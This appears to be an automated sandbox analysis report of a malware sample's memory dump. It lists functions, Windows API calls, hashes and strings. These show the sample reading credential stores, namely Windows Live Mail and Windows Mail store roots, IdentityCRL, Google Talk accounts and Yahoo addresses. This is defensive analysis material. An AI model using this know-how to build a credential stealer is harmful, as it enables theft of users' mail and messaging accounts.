Strings

Dynamic Salt, xrefs: 0040F4BA
Value, xrefs: 0040F4DD
Software\Microsoft\IdentityCRL, xrefs: 0040F49F
%GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd, xrefs: 0040F533, 0040F55A

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
String ID: %GKP$^%^&LL(%^$^O&TR$^%^GV6;lxzd$Dynamic Salt$Software\Microsoft\IdentityCRL$Value
API String ID: 2768085393-1693574875
Opcode ID: fbe27986f187398f0f6099073cdbbb7c8c5267cb5e8994caa430772f60085481
Instruction ID: 1e95abdde633212bff99c09de4f86b0a88236e9255236bdff490daf84838ddbe
Opcode Fuzzy Hash: fbe27986f187398f0f6099073cdbbb7c8c5267cb5e8994caa430772f60085481
Instruction Fuzzy Hash: 3F316FB2108305BFD710DF51DC80D9BB7ECEB89758F00093AFA84E2151D734D9198BAA

Uniqueness

Uniqueness Score: -1.00%

Function 004437D7, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004437F8
memset.MSVCRT ref: 00443866
memset.MSVCRT ref: 00443881
ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,?,00000000,00000104), ref: 004438BA
strlen.MSVCRT ref: 004438C8
_strcmpi.MSVCRT ref: 004438EE

Strings

Software\Microsoft\Windows Live Mail, xrefs: 00443897
\Microsoft\Windows Live Mail, xrefs: 0044383D
\Microsoft\Windows Mail, xrefs: 00443816
Store Root, xrefs: 00443892

Memory Dump Source

Source File: 00000017.00000001.609694889.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000001.610162970.000000000044F000.00000040.00020000.sdmp Download File
Associated: 00000017.00000001.610182009.0000000000452000.00000040.00020000.sdmp Download File

Similarity

API ID: memset$EnvironmentExpandStrings_strcmpistrlen
String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
API String ID: 3926036451-2578778931
Opcode ID: 7283eb58d102143fc17587a2bbd1ad5c38528a847a86ea281f8cc2ba274eb6fa
Instruction ID: 024f477f45f6e85a7703d2448ebd5bdc30730893e4efb81a5a52e1788c76f972
Opcode Fuzzy Hash: 7283eb58d102143fc17587a2bbd1ad5c38528a847a86ea281f8cc2ba274eb6fa
Instruction Fuzzy Hash: 723166B2508344AAF320FB99DC47FCB77DC9B88715F14441FF648D7182EA78964487AA

Uniqueness

Uniqueness Score: -1.00%

Function 004437D7, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004437F8

Part of subcall function 0040732D: strlen.MSVCRT ref: 0040732F
Part of subcall function 0040732D: strlen.MSVCRT ref: 0040733A
Part of subcall function 0040732D: _mbscat.MSVCRT ref: 00407351

Part of subcall function 0041072B: memset.MSVCRT ref: 00410780
Part of subcall function 0041072B: RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
Part of subcall function 0041072B: _mbscpy.MSVCRT ref: 004107F7

memset.MSVCRT ref: 00443866
memset.MSVCRT ref: 00443881

Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC

ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004438BA
strlen.MSVCRT ref: 004438C8
_strcmpi.MSVCRT ref: 004438EE

Strings

Store Root, xrefs: 00443892
Software\Microsoft\Windows Live Mail, xrefs: 00443897
\Microsoft\Windows Live Mail, xrefs: 0044383D
\Microsoft\Windows Mail, xrefs: 00443816

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
API String ID: 832325562-2578778931
Opcode ID: 6fc0dee76c051778cb740bd7e53ebdb0f4a90b1cda5d9aa213cda3ff8e9e6b3c
Instruction ID: 024f477f45f6e85a7703d2448ebd5bdc30730893e4efb81a5a52e1788c76f972
Opcode Fuzzy Hash: 6fc0dee76c051778cb740bd7e53ebdb0f4a90b1cda5d9aa213cda3ff8e9e6b3c
Instruction Fuzzy Hash: 723166B2508344AAF320FB99DC47FCB77DC9B88715F14441FF648D7182EA78964487AA

Uniqueness

Uniqueness Score: -1.00%

Function 0040EDD5, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0040EEDC
memset.MSVCRT ref: 0040EEF4

Part of subcall function 00407649: _mbsnbcat.MSVCRT ref: 00407669

RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040EF2A
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040EF57
RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F02C

Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5

Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F

memcpy.MSVCRT ref: 0040EFC7
LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040EFD9
RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F048

Strings

, xrefs: 0040EF6F

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
String ID:
API String ID: 2012582556-3916222277
Opcode ID: c56697a3f4471c298e0a90d4e79b27395d285dc68c8174379ef999514247f8f1
Instruction ID: 747b8e804c7bbb21ad1dd8da88f93546a58f2d2a8080c646c51fe7008e5948b4
Opcode Fuzzy Hash: c56697a3f4471c298e0a90d4e79b27395d285dc68c8174379ef999514247f8f1
Instruction Fuzzy Hash: 83811E618087CB9ECB21DBBC8C445DDBF745F17234F0843A9E5B47A2E2D3245A46C7AA

Uniqueness

Uniqueness Score: -1.00%

Function 004037BC, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004037DD
memset.MSVCRT ref: 004037F1

Part of subcall function 00443A35: memset.MSVCRT ref: 00443A57
Part of subcall function 00443A35: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3

Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE

strchr.MSVCRT ref: 00403860
_mbscpy.MSVCRT ref: 0040387D
strlen.MSVCRT ref: 00403889
sprintf.MSVCRT ref: 004038A9
_mbscpy.MSVCRT ref: 004038BF

Strings

%s@yahoo.com, xrefs: 004038A3

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
String ID: %s@yahoo.com
API String ID: 317221925-3288273942
Opcode ID: d60bca720589179ecaba888acfb06c659ae8ca2e8fa3040f7b3a2b52ee5dbe9d
Instruction ID: 0355cd0d48ae578dfdfe4a6cbfa0b9af13deca75d91fcedaec1ea3361aee035e
Opcode Fuzzy Hash: d60bca720589179ecaba888acfb06c659ae8ca2e8fa3040f7b3a2b52ee5dbe9d
Instruction Fuzzy Hash: D0215773D0412C5EEB21EA55DD41BDA77ACDF45308F0000EBB648F6081E6789F588F55

Uniqueness

Uniqueness Score: -1.00%

Function 004034D6, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004034F6
memset.MSVCRT ref: 0040350C

Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC

_mbscpy.MSVCRT ref: 00403547

Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B

_mbscat.MSVCRT ref: 0040355F

Strings

Software\Group Mail, xrefs: 00403522
fb.dat, xrefs: 00403559
InstallPath, xrefs: 0040351D

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: _mbscatmemset$Close_mbscpystrlen
String ID: InstallPath$Software\Group Mail$fb.dat
API String ID: 3071782539-966475738
Opcode ID: 54c8bbf3eb8d0466f411e99308dc44d2159ae764936348353c897a0f1e8016fc
Instruction ID: 06cca456285af6d778403e239192c4ceeddf5a100a2cf1fec545289e95a886a3
Opcode Fuzzy Hash: 54c8bbf3eb8d0466f411e99308dc44d2159ae764936348353c897a0f1e8016fc
Instruction Fuzzy Hash: 6901F07294412866EB20F2658C46FCB7A5C9B65705F0000B7BA49F20C3D9F86BD486A9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9F7, Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 0040CA1E
??2@YAPAXI@Z.MSVCRT ref: 0040CA3C
DeleteObject.GDI32(?), ref: 0040CA7A
memset.MSVCRT ref: 0040CAB6
LoadIconA.USER32(00000065), ref: 0040CAC6
_mbscpy.MSVCRT ref: 0040CAE4

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@$DeleteIconLoadObject_mbscpymemset
String ID:
API String ID: 2054149589-0
Opcode ID: ba951af192373a64cb311b94f1ad91644426618c8637830695619166661b1ba1
Instruction ID: 30546b7ffc0c4dd123ee27c8339ba671db17b069e44cca125f5e111fbf26b461
Opcode Fuzzy Hash: ba951af192373a64cb311b94f1ad91644426618c8637830695619166661b1ba1
Instruction Fuzzy Hash: D22190B5900324DBDB10EF648CC97D97BA8AB44705F1445BBEE08EF296D7B849408BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00444A4E, Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00444A45), ref: 00444A4E
GetModuleHandleA.KERNEL32(?,00444A45), ref: 00444AA0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444AC8

Part of subcall function 00444A6B: GetProcAddress.KERNEL32(00000000,00444A5C), ref: 00444A6C
Part of subcall function 00444A6B: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
Part of subcall function 00444A6B: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction ID: 64d8077581e7bfcf5b5a7686d9ec621b59dbeaea1ec513f5aad7139115001ce4
Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
Instruction Fuzzy Hash: 2C012D015C564139FB20A6F50C02BBB5F8D8AD7364B181B4BF150F7293D99C8D16937E

Uniqueness

Uniqueness Score: -1.00%

Function 00408344, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C

Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,004107BA,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410424

memset.MSVCRT ref: 00408392

Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA

memset.MSVCRT ref: 004083E3
RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
RegCloseKey.ADVAPI32(?), ref: 00408448

Strings

Software\Google\Google Talk\Accounts, xrefs: 00408363

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
String ID: Software\Google\Google Talk\Accounts
API String ID: 2959138223-1079885057
Opcode ID: d775ac8ba569fd5f9c268c161b920f0f986bb662fffb9e6d05309f5eaf26b962
Instruction ID: c6fde65740424625f6a31d6a262b66ef11e3a8462d59295f471bfbb40e3c967b
Opcode Fuzzy Hash: d775ac8ba569fd5f9c268c161b920f0f986bb662fffb9e6d05309f5eaf26b962
Instruction Fuzzy Hash: 5E2183B100824AAED610DF51DD42EABB7DCEF94344F00043EFA84911A2F675DD5D9BAB

Uniqueness

Uniqueness Score: -1.00%

Function 0040B783, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

_mbsicmp.MSVCRT ref: 0040B7A4
qsort.MSVCRT ref: 0040B84D
SetCursor.USER32(/nosort,?,0040CD7F), ref: 0040B85B

Strings

/sort, xrefs: 0040B79F
/nosort, xrefs: 0040B801

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Cursor_mbsicmpqsort
String ID: /nosort$/sort
API String ID: 882979914-1578091866
Opcode ID: 03f769c7a7038f55b0ee9a94e3be9c1bff0b3d406044db847ffe86aee8661350
Instruction ID: 59731eef90b6f0024c6c95bb6f71fb6a55e53d5caa10bc7ba91746e522f0a21b
Opcode Fuzzy Hash: 03f769c7a7038f55b0ee9a94e3be9c1bff0b3d406044db847ffe86aee8661350
Instruction Fuzzy Hash: AF21C4B1704501EFD719AB75C880AA9F3A8FF88314F21013EF419A7292C738B8118B99

Uniqueness

Uniqueness Score: -1.00%

Function 00406CCE, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00406CEA
memcpy.MSVCRT ref: 00406D02
??3@YAXPAX@Z.MSVCRT ref: 00406D0B

Strings

L{@, xrefs: 00406CD8
Mxt, xrefs: 00406CCE

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@mallocmemcpy
String ID: L{@$Mxt
API String ID: 3831604043-1438971311
Opcode ID: d6d4ff0e3f002e5145bea9cf4926563076f35589277d4ac2e4ccecb3b120ec48
Instruction ID: 120c5a36fa875b11696935209168df4f9df621bec9a22d80de65970bbd8b26ad
Opcode Fuzzy Hash: d6d4ff0e3f002e5145bea9cf4926563076f35589277d4ac2e4ccecb3b120ec48
Instruction Fuzzy Hash: 13F0E9727053225FD708EB75B94184B73DDAF84324712482FF505E7282D7389C60CB59

Uniqueness

Uniqueness Score: -1.00%

Function 00444A0F, Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,00444A45), ref: 00444AA0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444AC8

Part of subcall function 00444A4E: GetModuleHandleA.KERNEL32(00444A45), ref: 00444A4E
Part of subcall function 00444A4E: GetProcAddress.KERNEL32(00000000,00444A5C), ref: 00444A6C
Part of subcall function 00444A4E: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
Part of subcall function 00444A4E: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressHandleModuleProcProtectVirtual
String ID:
API String ID: 2099061454-0
Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction ID: ba634a3ae7870b83a4a63a7f1e5f980291c684f9ee159ca978f4bf55c64cb7ac
Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
Instruction Fuzzy Hash: 8C21F9521C82826FFB218BB44C017676FD9CBD3364B190A87E040EB243D5AC5856937E

Uniqueness

Uniqueness Score: -1.00%

Function 00444A6B, Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,00444A5C), ref: 00444A6C
VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92
GetModuleHandleA.KERNEL32(?,00444A45), ref: 00444AA0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00444AC8

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProcProtectVirtual$HandleModule
String ID:
API String ID: 2152742572-0
Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction ID: 9d415219164cce1615491981170e8b778fb578cfb811cd04a9329a68800e1f42
Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
Instruction Fuzzy Hash: DCF0C2412C52817DFB2195F50C42BBB4FCC8AE7360B280B47B110EB283D49D8D1693BE

Uniqueness

Uniqueness Score: -1.00%

Function 0041072B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 74registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0040CC91,74784DE0,?,00000000), ref: 0041068C
Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1

memset.MSVCRT ref: 00410780
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
_mbscpy.MSVCRT ref: 004107F7

Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66

Strings

Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
API String ID: 889583718-2036018995
Opcode ID: 041876d30c9f17697d718d1d44db80f9fc8f166af633a4907ba59ef04f65e57b
Instruction ID: 55274f9b0d4144c5a5f6b064647028c43f69cf0431b3c32ec78c32e38a1c383e
Opcode Fuzzy Hash: 041876d30c9f17697d718d1d44db80f9fc8f166af633a4907ba59ef04f65e57b
Instruction Fuzzy Hash: 2811D071C00218FBEB24F6948C85EEF77AC9B15304F1400B7F95161192E6B99ED4CA99

Uniqueness

Uniqueness Score: -1.00%

Function 004105DD, Relevance: 6.1, APIs: 4, Instructions: 55COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(?,?,?), ref: 004105EA
SizeofResource.KERNEL32(?,00000000), ref: 004105FB
LoadResource.KERNEL32(?,00000000), ref: 0041060B
LockResource.KERNEL32(00000000), ref: 00410616

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
Instruction ID: 4a68303d5b5253afd20c9a06ef53f1b3f3171458fb19c91adc6236e38678b247
Opcode Fuzzy Hash: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
Instruction Fuzzy Hash: 88019636600315AB8F155F65DC4599F7FAAFFD63917088036F909CA361D7B1C891C68C

Uniqueness

Uniqueness Score: -1.00%

Function 00410344, Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 0041036C

Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
memset.MSVCRT ref: 004103A7
GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: PrivateProfileStringmemset$Writememcpysprintf
String ID:
API String ID: 3143880245-0
Opcode ID: 452b48431850dc4cfeda6c40ef1c1e9db479f0d3b12d6eb92d0ce8910a14a719
Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
Opcode Fuzzy Hash: 452b48431850dc4cfeda6c40ef1c1e9db479f0d3b12d6eb92d0ce8910a14a719
Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69

Uniqueness

Uniqueness Score: -1.00%

Function 0044497B, Relevance: 6.0, APIs: 4, Instructions: 25COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 00444985
??3@YAXPAX@Z.MSVCRT ref: 00444995
??3@YAXPAX@Z.MSVCRT ref: 004449A5
??3@YAXPAX@Z.MSVCRT ref: 004449B5

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: dea8053bea9519698d4384faa1004d995cd5135f168310e2c543446b5ccfe19c
Instruction ID: 50686d444a9e23a331db2cec4592ac0caeb7afc27ca0d185df797a95cebddf31
Opcode Fuzzy Hash: dea8053bea9519698d4384faa1004d995cd5135f168310e2c543446b5ccfe19c
Instruction Fuzzy Hash: 70E0E6A170470196BA24ABBFBD55B1723ECAA84B66314092FB508D72B2DF2CD864D52C

Uniqueness

Uniqueness Score: -1.00%

Function 00408AA5, Relevance: 5.0, APIs: 4, Instructions: 36COMMON

Download Yara Rule

APIs

??2@YAPAXI@Z.MSVCRT ref: 00408ACD
??2@YAPAXI@Z.MSVCRT ref: 00408AEB
??2@YAPAXI@Z.MSVCRT ref: 00408B09
??2@YAPAXI@Z.MSVCRT ref: 00408B19

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
Instruction ID: 91b6e48186620c166d1d4af44a265f78501a0d7a4e3c1a8b362a1fb29a74aa2a
Opcode Fuzzy Hash: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
Instruction Fuzzy Hash: 17F0F9B5901300AFE7549B3CED0672676E4E75C356F04983FA30A8A2F2EB79C8448B08

Uniqueness

Uniqueness Score: -1.00%

Function 00406E26, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 14COMMON

Download Yara Rule

APIs

Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF

CreateFontIndirectA.GDI32(?), ref: 00406E44

Strings

Arial, xrefs: 00406E30

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateFontIndirect_mbscpymemset
String ID: Arial
API String ID: 3853255127-493054409
Opcode ID: 1c44140062a8a09da628618e702f5c67d17162cda1b56b1fc17a8be7a0fb16ae
Instruction ID: b68263c9f29210b4531b01fb65f498acbd183b68a5d206dac463ad1e531dcf8e
Opcode Fuzzy Hash: 1c44140062a8a09da628618e702f5c67d17162cda1b56b1fc17a8be7a0fb16ae
Instruction Fuzzy Hash: FFD0C974E4020C67DA10B7A0FC07F49776C5B01705F510421B901B10E2EAA4A15886D9

Uniqueness

Uniqueness Score: -1.00%

Function 0040CB90, Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00401E60: memset.MSVCRT ref: 00401E82
Part of subcall function 00401E60: strlen.MSVCRT ref: 00401E9B
Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EA9
Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EEF
Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EFD

_strcmpi.MSVCRT ref: 0040CBE4

Strings

/stext, xrefs: 0040CBDF

Memory Dump Source

Source File: 00000017.00000002.610475093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000017.00000002.610603634.000000000044F000.00000040.00000001.sdmp Download File
Associated: 00000017.00000002.610621422.0000000000452000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$_strcmpimemset
String ID: /stext
API String ID: 520177685-3817206916
Opcode ID: c906e694df2f1e329c2ad0273a3b26fae1964e0f17262c21461e5f274a22aefa
Instruction ID: cdbc65eb55c3596dd52c6b91df7f07afa5e13005eab10b9a6f004d04cd94ae5a
